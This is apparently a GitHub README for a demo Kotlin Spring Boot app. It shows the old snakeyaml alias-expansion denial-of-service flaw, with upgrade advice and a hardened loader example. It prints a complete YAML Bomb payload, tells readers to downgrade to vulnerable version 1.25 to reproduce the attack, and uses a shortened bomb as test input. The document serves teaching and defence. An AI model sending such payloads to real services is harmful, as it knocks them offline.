
https://github.com/leeturner/snakeyaml-dos-vulnerability


# snakeyaml DoS Vulnerability
An example application to demonstrate the (**now outdated**) DoS vulnerability in snakeyaml as described in this Snyk
article - https://snyk.io/blog/java-yaml-parser-with-snakeyaml/

This project currently pins version `1.32` of snakeyaml, which contains the fix (introduced in `1.26`) for the denial of
service attack described in the [Snyk Article](https://snyk.io/blog/java-yaml-parser-with-snakeyaml/). To reproduce the
attack described below you will need to downgrade the dependency to `1.25`:

```xml
<dependency>
    <groupId>org.yaml</groupId>
    <artifactId>snakeyaml</artifactId>
    <version>1.25</version>
</dependency>
```

This simple Spring Boot application written in Kotlin uses snakeyaml to parse a YAML payload and convert that payload into a DTO.

Once parsed, the DTO is printed to the console. A benign payload that parses successfully looks like this:

```yaml
firstname: "Matt"
lastname: "Murdock"
children:
  - firstname: "Jill"
    lastname: "Murdock"
  - firstname: "Bob"
    lastname: "Murdock"
    children:
      - firstname: "Bob Jnr"
        lastname: "Murdock"
```

When the YAML is converted to the `Person` DTO, you should see something similar to this in the console:

```
Person(
  firstname=Matt,
  lastname=Murdock,
  children=[
    Person(
      firstname=Jill,
      lastname=Murdock,
      children=[]
    ),
    Person(
      firstname=Bob,
      lastname=Murdock,
      children=[
        Person(
          firstname=Bob Jnr,
          lastname=Murdock,
          children=[]
        )
      ]
    )
  ]
)
```

YAML anchors (`&name`) and aliases (`*name`) let you define a node once and reference it any number of times so you
don't have to repeat yourself (read the article for a more detailed explanation). The payload below abuses this to build
a *YAML Bomb*, the YAML form of the Billion Laughs attack described in the article: `&a` is a two-element list, and each
of the eight lists that follow references the previous one nine times, so the fully expanded document contains 9^8
(about 43 million) copies of `a` from just over a kilobyte of input:

```yaml
firstname: "Matt"
lastname: "Murdock"
children:
- children: &a [{firstname: "Bob"},{lastname: "Smith"}]
- children: &b [{children: *a},{children: *a},{children: *a},{children: *a},{children: *a},{children: *a},{children: *a},{children: *a},{children: *a}]
- children: &c [{children: *b},{children: *b},{children: *b},{children: *b},{children: *b},{children: *b},{children: *b},{children: *b},{children: *b}]
- children: &d [{children: *c},{children: *c},{children: *c},{children: *c},{children: *c},{children: *c},{children: *c},{children: *c},{children: *c}]
- children: &e [{children: *d},{children: *d},{children: *d},{children: *d},{children: *d},{children: *d},{children: *d},{children: *d},{children: *d}]
- children: &f [{children: *e},{children: *e},{children: *e},{children: *e},{children: *e},{children: *e},{children: *e},{children: *e},{children: *e}]
- children: &g [{children: *f},{children: *f},{children: *f},{children: *f},{children: *f},{children: *f},{children: *f},{children: *f},{children: *f}]
- children: &h [{children: *g},{children: *g},{children: *g},{children: *g},{children: *g},{children: *g},{children: *g},{children: *g},{children: *g}]
- children: &i [{children: *h},{children: *h},{children: *h},{children: *h},{children: *h},{children: *h},{children: *h},{children: *h},{children: *h}]
```

If you send this payload to the demo application built against a recent version of snakeyaml (version 1.26 or greater),
the request fails with a `YAMLException`, and that is the correct outcome: the composer counts aliases to non-scalar
nodes as it reads the event stream and aborts at the 51st, before any `Person` objects are constructed, so the
*YAML Bomb* never expands:

```
2021-10-03 15:12:22.364 ERROR 13053 --- [nio-8080-exec-2] o.a.c.c.C.[.[.[.[dispatcherServlet] : Servlet.service() for servlet [dispatcherServlet] in context with path [/snakeyaml-dos] threw exception [Request processing failed; nested exception is org.yaml.snakeyaml.error.YAMLException: Number of aliases for non-scalar nodes exceeds the specified max=50] with root cause
```

With version 1.25 or lower of snakeyaml there is no alias limit. The loader expands every alias without restriction, and
the resulting object graph exhausts the heap, so the request dies with a `java.lang.OutOfMemoryError`:

```
2021-10-03 15:05:30.019 ERROR 12868 --- [nio-8080-exec-4] o.a.c.c.C.[.[.[.[dispatcherServlet] : Servlet.service() for servlet [dispatcherServlet] in context with path [/snakeyaml-dos] threw exception [Handler dispatch failed; nested exception is java.lang.OutOfMemoryError: Java heap space] with root cause
```

If you are using version 1.25 or lower of snakeyaml then you should upgrade to 1.26 or higher. Note that the fix is a
limit, not an immunity: `LoaderOptions.setMaxAliasesForCollections(int)` defaults to 50, which is far more than a DTO
like `Person` ever needs. If you accept YAML from untrusted clients, set the limit to what your schema actually
requires, and keep the library current, since later releases (including the `1.32` this project pins) add further
`LoaderOptions` limits on document size and nesting depth.
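A hardened loader for the `Person` DTO, as an added example that is not part of this repository's code: it makes the alias budget explicit through snakeyaml's `LoaderOptions.setMaxAliasesForCollections` (the 1.26 fix, default 50) and turns the resulting `YAMLException` into a rejected-request result instead of an unhandled 500. The `Person` class shape, `hardenedYaml`, `parsePerson`, `ParseResult` and the two sample documents are assumptions made for this example; the alias chain in `bomb` is a shortened copy of the README's payload.

```kotlin
import org.yaml.snakeyaml.LoaderOptions
import org.yaml.snakeyaml.Yaml
import org.yaml.snakeyaml.error.YAMLException

// Assumed DTO shape (the repo's own class is not shown on the page). snakeyaml
// instantiates beans through a no-arg constructor and fills them via setters,
// so every property is a `var` with a default value.
data class Person(
    var firstname: String = "",
    var lastname: String = "",
    var children: List<Person> = emptyList(),
)

// Loader with an explicit alias budget. 1.26+ already defaults
// maxAliasesForCollections to 50; a Person tree never legitimately needs
// more than a handful of aliases, so size the limit to the schema.
fun hardenedYaml(maxAliases: Int = 5): Yaml {
    val options = LoaderOptions().apply {
        maxAliasesForCollections = maxAliases
    }
    return Yaml(options)
}

// Lets the caller distinguish "parsed" from "rejected as a bomb" without
// letting the YAMLException propagate out of the controller as a 500.
sealed class ParseResult {
    data class Ok(val person: Person) : ParseResult()
    data class Rejected(val reason: String) : ParseResult()
}

fun parsePerson(yaml: Yaml, body: String): ParseResult =
    try {
        ParseResult.Ok(yaml.loadAs(body, Person::class.java))
    } catch (e: YAMLException) {
        // The composer throws before any Person is built, e.g.
        // "Number of aliases for non-scalar nodes exceeds the specified max=5"
        ParseResult.Rejected(e.message ?: e.javaClass.simpleName)
    }

// Constructed sample inputs for this example (not from the repo):
// the README's benign document, and a shortened alias chain in the same
// shape as its bomb (9 aliases to non-scalar nodes, which exceeds max=5).
val benign = """
    firstname: "Matt"
    lastname: "Murdock"
    children:
      - firstname: "Jill"
        lastname: "Murdock"
""".trimIndent()

val bomb = """
    firstname: "Matt"
    lastname: "Murdock"
    children:
      - children: &a [{firstname: "Bob"}, {lastname: "Smith"}]
      - children: &b [{children: *a}, {children: *a}, {children: *a}]
      - children: &c [{children: *b}, {children: *b}, {children: *b}]
      - children: &d [{children: *c}, {children: *c}, {children: *c}]
""".trimIndent()

fun main() {
    val yaml = hardenedYaml()
    println(parsePerson(yaml, benign))
    println(parsePerson(yaml, bomb))
}
```

The alias count is enforced while the event stream is being composed into nodes, which happens before `loadAs` constructs any `Person`, so a rejected document costs a few kilobytes of parser state rather than a heap's worth of objects. The limit only covers alias expansion; it says nothing about other parser hardening, so treat it as one setting among the other `LoaderOptions` limits rather than a complete untrusted-input policy.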

## References
* https://snyk.io/blog/java-yaml-parser-with-snakeyaml/
* https://snyk.io/vuln/SNYK-JAVA-ORGYAML-537645 (CVE-2017-18640, fixed in snakeyaml 1.26)